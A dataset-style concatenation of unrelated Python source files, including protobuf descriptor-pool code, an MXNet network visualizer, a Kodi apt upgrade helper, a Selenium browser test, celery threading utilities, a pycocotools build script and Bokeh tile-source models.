def _TryLoadExtensionFromDB(self, message_descriptor, number):
"""Try to Load extensions from descriptor db.
Args:
message_descriptor: descriptor of the extended message.
number: the extension number that needs to be loaded.
"""
if not self._descriptor_db:
return
# Only supported when FindFileContainingExtension is provided.
if not hasattr(
self._descriptor_db, 'FindFileContainingExtension'):
return
full_name = message_descriptor.full_name
file_proto = self._descriptor_db.FindFileContainingExtension(
full_name, number)
if file_proto is None:
return
try:
self._ConvertFileProtoToFileDescriptor(file_proto)
except:
warn_msg = ('Unable to load proto file %s for extension number %d.' %
(file_proto.name, number))
warnings.warn(warn_msg, RuntimeWarning)
def FindServiceByName(self, full_name):
"""Loads the named service descriptor from the pool.
Args:
full_name (str): The full name of the service descriptor to load.
Returns:
ServiceDescriptor: The service descriptor for the named service.
Raises:
KeyError: if the service cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
if full_name not in self._service_descriptors:
self._FindFileContainingSymbolInDb(full_name)
return self._service_descriptors[full_name]
def FindMethodByName(self, full_name):
"""Loads the named service method descriptor from the pool.
Args:
full_name (str): The full name of the method descriptor to load.
Returns:
MethodDescriptor: The method descriptor for the service method.
Raises:
KeyError: if the method cannot be found in the pool.
"""
full_name = _NormalizeFullyQualifiedName(full_name)
service_name, _, method_name = full_name.rpartition('.')
service_descriptor = self.FindServiceByName(service_name)
return service_descriptor.methods_by_name[method_name]
def _FindFileContainingSymbolInDb(self, symbol):
"""Finds the file in descriptor DB containing the specified symbol.
Args:
symbol (str): The name of the symbol to search for.
Returns:
FileDescriptor: The file that contains the specified symbol.
Raises:
KeyError: if the file cannot be found in the descriptor database.
"""
try:
file_proto = self._internal_db.FindFileContainingSymbol(symbol)
except KeyError as error:
if self._descriptor_db:
file_proto = self._descriptor_db.FindFileContainingSymbol(symbol)
else:
raise error
if not file_proto:
raise KeyError('Cannot find a file containing %s' % symbol)
return self._ConvertFileProtoToFileDescriptor(file_proto)
def _ConvertFileProtoToFileDescriptor(self, file_proto):
"""Creates a FileDescriptor from a proto or returns a cached copy.
This method also has the side effect of loading all the symbols found in
the file into the appropriate dictionaries in the pool.
Args:
file_proto: The proto to convert.
Returns:
A FileDescriptor matching the passed in proto.
"""
if file_proto.name not in self._file_descriptors:
built_deps = list(self._GetDeps(file_proto.dependency))
direct_deps = [self.FindFileByName(n) for n in file_proto.dependency]
public_deps = [direct_deps[i] for i in file_proto.public_dependency]
file_descriptor = descriptor.FileDescriptor(
pool=self,
name=file_proto.name,
package=file_proto.package,
syntax=file_proto.syntax,
options=_OptionsOrNone(file_proto),
serialized_pb=file_proto.SerializeToString(),
dependencies=direct_deps,
public_dependencies=public_deps,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
scope = {}
# This loop extracts all the message and enum types from all the
# dependencies of the file_proto. This is necessary to create the
# scope of available message types when defining the passed in
# file proto.
for dependency in built_deps:
scope.update(self._ExtractSymbols(
dependency.message_types_by_name.values()))
scope.update((_PrefixWithDot(enum.full_name), enum)
for enum in dependency.enum_types_by_name.values())
for message_type in file_proto.message_type:
message_desc = self._ConvertMessageDescriptor(
message_type, file_proto.package, file_descriptor, scope,
file_proto.syntax)
file_descriptor.message_types_by_name[message_desc.name] = (
message_desc)
for enum_type in file_proto.enum_type:
file_descriptor.enum_types_by_name[enum_type.name] = (
self._ConvertEnumDescriptor(enum_type, file_proto.package,
file_descriptor, None, scope, True))
for index, extension_proto in enumerate(file_proto.extension):
extension_desc = self._MakeFieldDescriptor(
extension_proto, file_proto.package, index, file_descriptor,
is_extension=True)
extension_desc.containing_type = self._GetTypeFromScope(
file_descriptor.package, extension_proto.extendee, scope)
self._SetFieldType(extension_proto, extension_desc,
file_descriptor.package, scope)
file_descriptor.extensions_by_name[extension_desc.name] = (
extension_desc)
self._file_desc_by_toplevel_extension[extension_desc.full_name] = (
file_descriptor)
for desc_proto in file_proto.message_type:
self._SetAllFieldTypes(file_proto.package, desc_proto, scope)
if file_proto.package:
desc_proto_prefix = _PrefixWithDot(file_proto.package)
else:
desc_proto_prefix = ''
for desc_proto in file_proto.message_type:
desc = self._GetTypeFromScope(
desc_proto_prefix, desc_proto.name, scope)
file_descriptor.message_types_by_name[desc_proto.name] = desc
for index, service_proto in enumerate(file_proto.service):
file_descriptor.services_by_name[service_proto.name] = (
self._MakeServiceDescriptor(service_proto, index, scope,
file_proto.package, file_descriptor))
self.Add(file_proto)
self._file_descriptors[file_proto.name] = file_descriptor
# Add extensions to the pool
file_desc = self._file_descriptors[file_proto.name]
for extension in file_desc.extensions_by_name.values():
self._AddExtensionDescriptor(extension)
for message_type in file_desc.message_types_by_name.values():
for extension in message_type.extensions:
self._AddExtensionDescriptor(extension)
return file_desc
def _ConvertMessageDescriptor(self, desc_proto, package=None, file_desc=None,
scope=None, syntax=None):
"""Adds the proto to the pool in the specified package.
Args:
desc_proto: The descriptor_pb2.DescriptorProto protobuf message.
package: The package the proto should be located in.
file_desc: The file containing this message.
scope: Dict mapping short and full symbols to message and enum types.
syntax: string indicating syntax of the file ("proto2" or "proto3")
Returns:
The added descriptor.
"""
if package:
desc_name = '.'.join((package, desc_proto.name))
else:
desc_name = desc_proto.name
if file_desc is None:
file_name = None
else:
file_name = file_desc.name
if scope is None:
scope = {}
nested = [
self._ConvertMessageDescriptor(
nested, desc_name, file_desc, scope, syntax)
for nested in desc_proto.nested_type]
enums = [
self._ConvertEnumDescriptor(enum, desc_name, file_desc, None,
scope, False)
for enum in desc_proto.enum_type]
fields = [self._MakeFieldDescriptor(field, desc_name, index, file_desc)
for index, field in enumerate(desc_proto.field)]
extensions = [
self._MakeFieldDescriptor(extension, desc_name, index, file_desc,
is_extension=True)
for index, extension in enumerate(desc_proto.extension)]
oneofs = [
# pylint: disable=g-complex-comprehension
descriptor.OneofDescriptor(desc.name, '.'.join((desc_name, desc.name)),
index, None, [], desc.options,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
for index, desc in enumerate(desc_proto.oneof_decl)]
extension_ranges = [(r.start, r.end) for r in desc_proto.extension_range]
if extension_ranges:
is_extendable = True
else:
is_extendable = False
desc = descriptor.Descriptor(
name=desc_proto.name,
full_name=desc_name,
filename=file_name,
containing_type=None,
fields=fields,
oneofs=oneofs,
nested_types=nested,
enum_types=enums,
extensions=extensions,
options=_OptionsOrNone(desc_proto),
is_extendable=is_extendable,
extension_ranges=extension_ranges,
file=file_desc,
serialized_start=None,
serialized_end=None,
syntax=syntax,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
for nested in desc.nested_types:
nested.containing_type = desc
for enum in desc.enum_types:
enum.containing_type = desc
for field_index, field_desc in enumerate(desc_proto.field):
if field_desc.HasField('oneof_index'):
oneof_index = field_desc.oneof_index
oneofs[oneof_index].fields.append(fields[field_index])
fields[field_index].containing_oneof = oneofs[oneof_index]
scope[_PrefixWithDot(desc_name)] = desc
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._descriptors[desc_name] = desc
return desc
def _ConvertEnumDescriptor(self, enum_proto, package=None, file_desc=None,
containing_type=None, scope=None, top_level=False):
"""Make a protobuf EnumDescriptor given an EnumDescriptorProto protobuf.
Args:
enum_proto: The descriptor_pb2.EnumDescriptorProto protobuf message.
package: Optional package name for the new message EnumDescriptor.
file_desc: The file containing the enum descriptor.
containing_type: The type containing this enum.
scope: Scope containing available types.
top_level: If True, the enum is a top level symbol. If False, the enum
is defined inside a message.
Returns:
The added descriptor
"""
if package:
enum_name = '.'.join((package, enum_proto.name))
else:
enum_name = enum_proto.name
if file_desc is None:
file_name = None
else:
file_name = file_desc.name
values = [self._MakeEnumValueDescriptor(value, index)
for index, value in enumerate(enum_proto.value)]
desc = descriptor.EnumDescriptor(name=enum_proto.name,
full_name=enum_name,
filename=file_name,
file=file_desc,
values=values,
containing_type=containing_type,
options=_OptionsOrNone(enum_proto),
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
scope['.%s' % enum_name] = desc
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._enum_descriptors[enum_name] = desc
# Add top level enum values.
if top_level:
for value in values:
full_name = _NormalizeFullyQualifiedName(
'.'.join((package, value.name)))
self._CheckConflictRegister(value, full_name, file_name)
self._top_enum_values[full_name] = value
return desc
def _MakeFieldDescriptor(self, field_proto, message_name, index,
file_desc, is_extension=False):
"""Creates a field descriptor from a FieldDescriptorProto.
For message and enum type fields, this method will do a look up
in the pool for the appropriate descriptor for that type. If it
is unavailable, it will fall back to the _source function to
create it. If this type is still unavailable, construction will
fail.
Args:
field_proto: The proto describing the field.
message_name: The name of the containing message.
index: Index of the field
file_desc: The file containing the field descriptor.
is_extension: Indication that this field is for an extension.
Returns:
An initialized FieldDescriptor object
"""
if message_name:
full_name = '.'.join((message_name, field_proto.name))
else:
full_name = field_proto.name
return descriptor.FieldDescriptor(
name=field_proto.name,
full_name=full_name,
index=index,
number=field_proto.number,
type=field_proto.type,
cpp_type=None,
message_type=None,
enum_type=None,
containing_type=None,
label=field_proto.label,
has_default_value=False,
default_value=None,
is_extension=is_extension,
extension_scope=None,
options=_OptionsOrNone(field_proto),
file=file_desc,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _SetAllFieldTypes(self, package, desc_proto, scope):
"""Sets all the descriptor's fields's types.
This method also sets the containing types on any extensions.
Args:
package: The current package of desc_proto.
desc_proto: The message descriptor to update.
scope: Enclosing scope of available types.
"""
package = _PrefixWithDot(package)
main_desc = self._GetTypeFromScope(package, desc_proto.name, scope)
if package == '.':
nested_package = _PrefixWithDot(desc_proto.name)
else:
nested_package = '.'.join([package, desc_proto.name])
for field_proto, field_desc in zip(desc_proto.field, main_desc.fields):
self._SetFieldType(field_proto, field_desc, nested_package, scope)
for extension_proto, extension_desc in (
zip(desc_proto.extension, main_desc.extensions)):
extension_desc.containing_type = self._GetTypeFromScope(
nested_package, extension_proto.extendee, scope)
self._SetFieldType(extension_proto, extension_desc, nested_package, scope)
for nested_type in desc_proto.nested_type:
self._SetAllFieldTypes(nested_package, nested_type, scope)
def _SetFieldType(self, field_proto, field_desc, package, scope):
"""Sets the field's type, cpp_type, message_type and enum_type.
Args:
field_proto: Data about the field in proto format.
field_desc: The descriptor to modify.
package: The package the field's container is in.
scope: Enclosing scope of available types.
"""
if field_proto.type_name:
desc = self._GetTypeFromScope(package, field_proto.type_name, scope)
else:
desc = None
if not field_proto.HasField('type'):
if isinstance(desc, descriptor.Descriptor):
field_proto.type = descriptor.FieldDescriptor.TYPE_MESSAGE
else:
field_proto.type = descriptor.FieldDescriptor.TYPE_ENUM
field_desc.cpp_type = descriptor.FieldDescriptor.ProtoTypeToCppProtoType(
field_proto.type)
if (field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE
or field_proto.type == descriptor.FieldDescriptor.TYPE_GROUP):
field_desc.message_type = desc
if field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.enum_type = desc
if field_proto.label == descriptor.FieldDescriptor.LABEL_REPEATED:
field_desc.has_default_value = False
field_desc.default_value = []
elif field_proto.HasField('default_value'):
field_desc.has_default_value = True
if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or
field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT):
field_desc.default_value = float(field_proto.default_value)
elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING:
field_desc.default_value = field_proto.default_value
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL:
field_desc.default_value = field_proto.default_value.lower() == 'true'
elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.default_value = field_desc.enum_type.values_by_name[
field_proto.default_value].number
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES:
field_desc.default_value = text_encoding.CUnescape(
field_proto.default_value)
elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE:
field_desc.default_value = None
else:
# All other types are of the "int" type.
field_desc.default_value = int(field_proto.default_value)
else:
field_desc.has_default_value = False
if (field_proto.type == descriptor.FieldDescriptor.TYPE_DOUBLE or
field_proto.type == descriptor.FieldDescriptor.TYPE_FLOAT):
field_desc.default_value = 0.0
elif field_proto.type == descriptor.FieldDescriptor.TYPE_STRING:
field_desc.default_value = u''
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BOOL:
field_desc.default_value = False
elif field_proto.type == descriptor.FieldDescriptor.TYPE_ENUM:
field_desc.default_value = field_desc.enum_type.values[0].number
elif field_proto.type == descriptor.FieldDescriptor.TYPE_BYTES:
field_desc.default_value = b''
elif field_proto.type == descriptor.FieldDescriptor.TYPE_MESSAGE:
field_desc.default_value = None
else:
# All other types are of the "int" type.
field_desc.default_value = 0
field_desc.type = field_proto.type
def _MakeEnumValueDescriptor(self, value_proto, index):
"""Creates a enum value descriptor object from a enum value proto.
Args:
value_proto: The proto describing the enum value.
index: The index of the enum value.
Returns:
An initialized EnumValueDescriptor object.
"""
return descriptor.EnumValueDescriptor(
name=value_proto.name,
index=index,
number=value_proto.number,
options=_OptionsOrNone(value_proto),
type=None,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _MakeServiceDescriptor(self, service_proto, service_index, scope,
package, file_desc):
"""Make a protobuf ServiceDescriptor given a ServiceDescriptorProto.
Args:
service_proto: The descriptor_pb2.ServiceDescriptorProto protobuf message.
service_index: The index of the service in the File.
scope: Dict mapping short and full symbols to message and enum types.
package: Optional package name for the new message EnumDescriptor.
file_desc: The file containing the service descriptor.
Returns:
The added descriptor.
"""
if package:
service_name = '.'.join((package, service_proto.name))
else:
service_name = service_proto.name
methods = [self._MakeMethodDescriptor(method_proto, service_name, package,
scope, index)
for index, method_proto in enumerate(service_proto.method)]
desc = descriptor.ServiceDescriptor(
name=service_proto.name,
full_name=service_name,
index=service_index,
methods=methods,
options=_OptionsOrNone(service_proto),
file=file_desc,
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
self._CheckConflictRegister(desc, desc.full_name, desc.file.name)
self._service_descriptors[service_name] = desc
return desc
def _MakeMethodDescriptor(self, method_proto, service_name, package, scope,
index):
"""Creates a method descriptor from a MethodDescriptorProto.
Args:
method_proto: The proto describing the method.
service_name: The name of the containing service.
package: Optional package name to look up for types.
scope: Scope containing available types.
index: Index of the method in the service.
Returns:
An initialized MethodDescriptor object.
"""
full_name = '.'.join((service_name, method_proto.name))
input_type = self._GetTypeFromScope(
package, method_proto.input_type, scope)
output_type = self._GetTypeFromScope(
package, method_proto.output_type, scope)
return descriptor.MethodDescriptor(
name=method_proto.name,
full_name=full_name,
index=index,
containing_service=None,
input_type=input_type,
output_type=output_type,
options=_OptionsOrNone(method_proto),
# pylint: disable=protected-access
create_key=descriptor._internal_create_key)
def _ExtractSymbols(self, descriptors):
"""Pulls out all the symbols from descriptor protos.
Args:
descriptors: The messages to extract descriptors from.
Yields:
A two element tuple of the type name and descriptor object.
"""
for desc in descriptors:
yield (_PrefixWithDot(desc.full_name), desc)
for symbol in self._ExtractSymbols(desc.nested_types):
yield symbol
for enum in desc.enum_types:
yield (_PrefixWithDot(enum.full_name), enum)
def _GetDeps(self, dependencies):
"""Recursively finds dependencies for file protos.
Args:
dependencies: The names of the files being depended on.
Yields:
Each direct and indirect dependency.
"""
for dependency in dependencies:
dep_desc = self.FindFileByName(dependency)
yield dep_desc
for parent_dep in dep_desc.dependencies:
yield parent_dep
def _GetTypeFromScope(self, package, type_name, scope):
"""Finds a given type name in the current scope.
Args:
package: The package the proto should be located in.
type_name: The name of the type to be found in the scope.
scope: Dict mapping short and full symbols to message and enum types.
Returns:
The descriptor for the requested type.
"""
if type_name not in scope:
components = _PrefixWithDot(package).split('.')
while components:
possible_match = '.'.join(components + [type_name])
if possible_match in scope:
type_name = possible_match
break
else:
components.pop(-1)
return scope[type_name]
def _PrefixWithDot(name):
return name if name.startswith('.') else '.%s' % name
if _USE_C_DESCRIPTORS:
# TODO(amauryfa): This pool could be constructed from Python code, when we
# support a flag like 'use_cpp_generated_pool=True'.
# pylint: disable=protected-access
_DEFAULT = descriptor._message.default_pool
else:
_DEFAULT = DescriptorPool()
def Default():
return _DEFAULT
| apache-2.0 | -2,547,859,049,443,851,000 | 35.617624 | 86 | 0.677553 | false |
Ldpe2G/mxnet | example/ssd/tools/visualize_net.py | 10 | 1148 | from __future__ import print_function
import find_mxnet
import mxnet as mx
import importlib
import argparse
import sys
parser = argparse.ArgumentParser(description='network visualization')
parser.add_argument('--network', type=str, default='vgg16_ssd_300',
choices = ['vgg16_ssd_300', 'vgg16_ssd_512'],
help = 'the cnn to use')
parser.add_argument('--num-classes', type=int, default=20,
help='the number of classes')
parser.add_argument('--data-shape', type=int, default=300,
help='set image\'s shape')
parser.add_argument('--train', action='store_true', default=False, help='show train net')
args = parser.parse_args()
sys.path.append('../symbol')
if not args.train:
net = importlib.import_module("symbol_" + args.network).get_symbol(args.num_classes)
a = mx.viz.plot_network(net, shape={"data":(1,3,args.data_shape,args.data_shape)}, \
node_attrs={"shape":'rect', "fixedsize":'false'})
a.render("ssd_" + args.network)
else:
net = importlib.import_module("symbol_" + args.network).get_symbol_train(args.num_classes)
print(net.tojson())
| apache-2.0 | -8,409,465,352,750,513,000 | 40 | 94 | 0.655923 | false |
atupone/xbmc | addons/service.xbmc.versioncheck/lib/aptdeamonhandler.py | 177 | 3661 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Team-XBMC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import xbmc
from common import *
try:
#import apt
import apt
from aptdaemon import client
from aptdaemon import errors
except:
log('python apt import error')
class AptdeamonHandler:
def __init__(self):
self.aptclient = client.AptClient()
def _check_versions(self, package):
if not self._update_cache():
return False, False
try:
trans = self.aptclient.upgrade_packages([package])
#trans = self.aptclient.upgrade_packages("bla")
trans.simulate(reply_handler=self._apttransstarted, error_handler=self._apterrorhandler)
pkg = trans.packages[4][0]
if pkg == package:
cache=apt.Cache()
cache.open(None)
cache.upgrade()
if cache[pkg].installed:
return cache[pkg].installed.version, cache[pkg].candidate.version
return False, False
except Exception as error:
log("Exception while checking versions: %s" %error)
return False, False
def _update_cache(self):
try:
if self.aptclient.update_cache(wait=True) == "exit-success":
return True
else:
return False
except errors.NotAuthorizedError:
log("You are not allowed to update the cache")
return False
def check_upgrade_available(self, package):
'''returns True if newer package is available in the repositories'''
installed, candidate = self._check_versions(package)
if installed and candidate:
if installed != candidate:
log("Version installed %s" %installed)
log("Version available %s" %candidate)
return True
else:
log("Already on newest version")
elif not installed:
log("No installed package found")
return False
else:
return False
def upgrade_package(self, package):
try:
log("Installing new version")
if self.aptclient.upgrade_packages([package], wait=True) == "exit-success":
log("Upgrade successful")
return True
except Exception as error:
log("Exception during upgrade: %s" %error)
return False
def upgrade_system(self):
try:
log("Upgrading system")
if self.aptclient.upgrade_system(wait=True) == "exit-success":
return True
except Exception as error:
log("Exception during system upgrade: %s" %error)
return False
def _getpassword(self):
if len(self._pwd) == 0:
self._pwd = get_password_from_user()
return self._pwd
def _apttransstarted(self):
pass
def _apterrorhandler(self, error):
log("Apt Error %s" %error) | gpl-2.0 | -6,974,354,175,733,703,000 | 32.59633 | 100 | 0.593281 | false |
slaws/kubernetes | examples/selenium/selenium-test.py | 173 | 1109 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
def check_browser(browser):
driver = webdriver.Remote(
command_executor='http://selenium-hub:4444/wd/hub',
desired_capabilities=getattr(DesiredCapabilities, browser)
)
driver.get("http://google.com")
assert "google" in driver.page_source
driver.close()
print("Browser %s checks out!" % browser)
check_browser("FIREFOX")
check_browser("CHROME")
| apache-2.0 | 548,476,315,147,377,340 | 32.606061 | 78 | 0.759243 | false |
johankaito/fufuka | microblog/flask/venv/lib/python2.7/site-packages/celery/utils/threads.py | 9 | 9636 | # -*- coding: utf-8 -*-
"""
celery.utils.threads
~~~~~~~~~~~~~~~~~~~~
Threading utilities.
"""
from __future__ import absolute_import, print_function
import os
import socket
import sys
import threading
import traceback
from contextlib import contextmanager
from celery.local import Proxy
from celery.five import THREAD_TIMEOUT_MAX, items
__all__ = ['bgThread', 'Local', 'LocalStack', 'LocalManager',
'get_ident', 'default_socket_timeout']
USE_FAST_LOCALS = os.environ.get('USE_FAST_LOCALS')
PY3 = sys.version_info[0] == 3
@contextmanager
def default_socket_timeout(timeout):
prev = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
yield
socket.setdefaulttimeout(prev)
class bgThread(threading.Thread):
def __init__(self, name=None, **kwargs):
super(bgThread, self).__init__()
self._is_shutdown = threading.Event()
self._is_stopped = threading.Event()
self.daemon = True
self.name = name or self.__class__.__name__
def body(self):
raise NotImplementedError('subclass responsibility')
def on_crash(self, msg, *fmt, **kwargs):
print(msg.format(*fmt), file=sys.stderr)
exc_info = sys.exc_info()
try:
traceback.print_exception(exc_info[0], exc_info[1], exc_info[2],
None, sys.stderr)
finally:
del(exc_info)
def run(self):
body = self.body
shutdown_set = self._is_shutdown.is_set
try:
while not shutdown_set():
try:
body()
except Exception as exc:
try:
self.on_crash('{0!r} crashed: {1!r}', self.name, exc)
self._set_stopped()
finally:
os._exit(1) # exiting by normal means won't work
finally:
self._set_stopped()
def _set_stopped(self):
try:
self._is_stopped.set()
except TypeError: # pragma: no cover
# we lost the race at interpreter shutdown,
# so gc collected built-in modules.
pass
def stop(self):
"""Graceful shutdown."""
self._is_shutdown.set()
self._is_stopped.wait()
if self.is_alive():
self.join(THREAD_TIMEOUT_MAX)
try:
from greenlet import getcurrent as get_ident
except ImportError: # pragma: no cover
try:
from _thread import get_ident # noqa
except ImportError:
try:
from thread import get_ident # noqa
except ImportError: # pragma: no cover
try:
from _dummy_thread import get_ident # noqa
except ImportError:
from dummy_thread import get_ident # noqa
def release_local(local):
"""Releases the contents of the local for the current context.
This makes it possible to use locals without a manager.
Example::
>>> loc = Local()
>>> loc.foo = 42
>>> release_local(loc)
>>> hasattr(loc, 'foo')
False
With this function one can release :class:`Local` objects as well
as :class:`StackLocal` objects. However it is not possible to
release data held by proxies that way, one always has to retain
a reference to the underlying local object in order to be able
to release it.
.. versionadded:: 0.6.1
"""
local.__release_local__()
class Local(object):
__slots__ = ('__storage__', '__ident_func__')
def __init__(self):
object.__setattr__(self, '__storage__', {})
object.__setattr__(self, '__ident_func__', get_ident)
def __iter__(self):
return iter(items(self.__storage__))
def __call__(self, proxy):
"""Create a proxy for a name."""
return Proxy(self, proxy)
def __release_local__(self):
self.__storage__.pop(self.__ident_func__(), None)
def __getattr__(self, name):
try:
return self.__storage__[self.__ident_func__()][name]
except KeyError:
raise AttributeError(name)
def __setattr__(self, name, value):
ident = self.__ident_func__()
storage = self.__storage__
try:
storage[ident][name] = value
except KeyError:
storage[ident] = {name: value}
def __delattr__(self, name):
try:
del self.__storage__[self.__ident_func__()][name]
except KeyError:
raise AttributeError(name)
class _LocalStack(object):
"""This class works similar to a :class:`Local` but keeps a stack
of objects instead. This is best explained with an example::
>>> ls = LocalStack()
>>> ls.push(42)
>>> ls.top
42
>>> ls.push(23)
>>> ls.top
23
>>> ls.pop()
23
>>> ls.top
42
They can be force released by using a :class:`LocalManager` or with
the :func:`release_local` function but the correct way is to pop the
item from the stack after using. When the stack is empty it will
no longer be bound to the current context (and as such released).
By calling the stack without arguments it will return a proxy that
resolves to the topmost item on the stack.
"""
def __init__(self):
self._local = Local()
def __release_local__(self):
self._local.__release_local__()
def _get__ident_func__(self):
return self._local.__ident_func__
def _set__ident_func__(self, value):
object.__setattr__(self._local, '__ident_func__', value)
__ident_func__ = property(_get__ident_func__, _set__ident_func__)
del _get__ident_func__, _set__ident_func__
def __call__(self):
def _lookup():
rv = self.top
if rv is None:
raise RuntimeError('object unbound')
return rv
return Proxy(_lookup)
def push(self, obj):
"""Pushes a new item to the stack"""
rv = getattr(self._local, 'stack', None)
if rv is None:
self._local.stack = rv = []
rv.append(obj)
return rv
def pop(self):
"""Remove the topmost item from the stack, will return the
old value or `None` if the stack was already empty.
"""
stack = getattr(self._local, 'stack', None)
if stack is None:
return None
elif len(stack) == 1:
release_local(self._local)
return stack[-1]
else:
return stack.pop()
def __len__(self):
stack = getattr(self._local, 'stack', None)
return len(stack) if stack else 0
@property
def stack(self):
"""get_current_worker_task uses this to find
the original task that was executed by the worker."""
stack = getattr(self._local, 'stack', None)
if stack is not None:
return stack
return []
@property
def top(self):
"""The topmost item on the stack. If the stack is empty,
`None` is returned.
"""
try:
return self._local.stack[-1]
except (AttributeError, IndexError):
return None
class LocalManager(object):
"""Local objects cannot manage themselves. For that you need a local
manager. You can pass a local manager multiple locals or add them
later by appending them to `manager.locals`. Everytime the manager
cleans up it, will clean up all the data left in the locals for this
context.
The `ident_func` parameter can be added to override the default ident
function for the wrapped locals.
"""
def __init__(self, locals=None, ident_func=None):
if locals is None:
self.locals = []
elif isinstance(locals, Local):
self.locals = [locals]
else:
self.locals = list(locals)
if ident_func is not None:
self.ident_func = ident_func
for local in self.locals:
object.__setattr__(local, '__ident_func__', ident_func)
else:
self.ident_func = get_ident
def get_ident(self):
"""Return the context identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals."""
return self.ident_func()
def cleanup(self):
"""Manually clean up the data in the locals for this context.
Call this at the end of the request or use `make_middleware()`.
"""
for local in self.locals:
release_local(local)
def __repr__(self):
return '<{0} storages: {1}>'.format(
self.__class__.__name__, len(self.locals))
class _FastLocalStack(threading.local):
def __init__(self):
self.stack = []
self.push = self.stack.append
self.pop = self.stack.pop
@property
def top(self):
try:
return self.stack[-1]
except (AttributeError, IndexError):
return None
def __len__(self):
return len(self.stack)
if USE_FAST_LOCALS: # pragma: no cover
LocalStack = _FastLocalStack
else:
# - See #706
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets are not available we
# fall back to the current thread ident.
LocalStack = _LocalStack # noqa
| apache-2.0 | -7,573,093,522,221,937,000 | 28.288754 | 77 | 0.567663 | false |
smolix/incubator-mxnet | example/rcnn/rcnn/pycocotools/setup.py | 41 | 1365 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
import numpy as np
# To compile and install locally run "python setup.py build_ext --inplace"
# To install library to Python site-packages run "python setup.py build_ext install"
ext_modules = [
Extension(
'_mask',
sources=['maskApi.c', '_mask.pyx'],
include_dirs=[np.get_include()],
extra_compile_args=['-Wno-cpp', '-Wno-unused-function', '-std=c99'],
)
]
setup(name='pycocotools',
ext_modules=cythonize(ext_modules)
)
| apache-2.0 | 6,590,900,181,042,303,000 | 35.891892 | 84 | 0.734799 | false |
KasperPRasmussen/bokeh | bokeh/models/tiles.py | 8 | 4095 | from __future__ import absolute_import
from ..model import Model
from ..core.properties import Any, Dict, Float, String, Int, Bool, Override
class TileSource(Model):
""" A base class for all tile source types. ``TileSource`` is
not generally useful to instantiate on its own. In general, tile sources are used as a required input for ``TileRenderer``.
Subclasses should have these properties as well:
x_origin_offset = Float
y_origin_offset = Float
initial_resolution = Float
"""
_args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'extra_url_vars')
url = String("", help="""
tile service url (example: http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png)
""")
tile_size = Int(default=256, help="""
tile size in pixels (e.g. 256)
""")
min_zoom = Int(default=0, help="""
the minimum zoom level for the tile layer. This is the most "zoomed-out" level.
""")
max_zoom = Int(default=30, help="""
the maximum zoom level for the tile layer. This is the most "zoomed-in" level.
""")
extra_url_vars = Dict(String, Any, help="""
A dictionary that maps url variable template keys to values.
These variables are useful for parts of tile urls which do not change from tile to tile (e.g. server host name, or layer name).
""")
attribution = String("", help="""
Data provider attribution content. This can include HTML content.
""")
x_origin_offset = Float(help="""
x offset in plot coordinates
""")
y_origin_offset = Float(help="""
y offset in plot coordinates
""")
initial_resolution = Float(help="""
resolution (plot_units / pixels) of minimum zoom level of tileset projection. None to auto-compute.
""")
class MercatorTileSource(TileSource):
"""``MercatorTileSource`` is not generally useful to instantiate on its own, but is the parent class of mercator tile services (e.g. ``WMTSTileSource``).
"""
_args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'x_origin_offset', 'y_origin_offset', 'extra_url_vars', 'initial_resolution')
x_origin_offset = Override(default=20037508.34)
y_origin_offset = Override(default=20037508.34)
initial_resolution = Override(default=156543.03392804097)
wrap_around = Bool(default=True, help="""
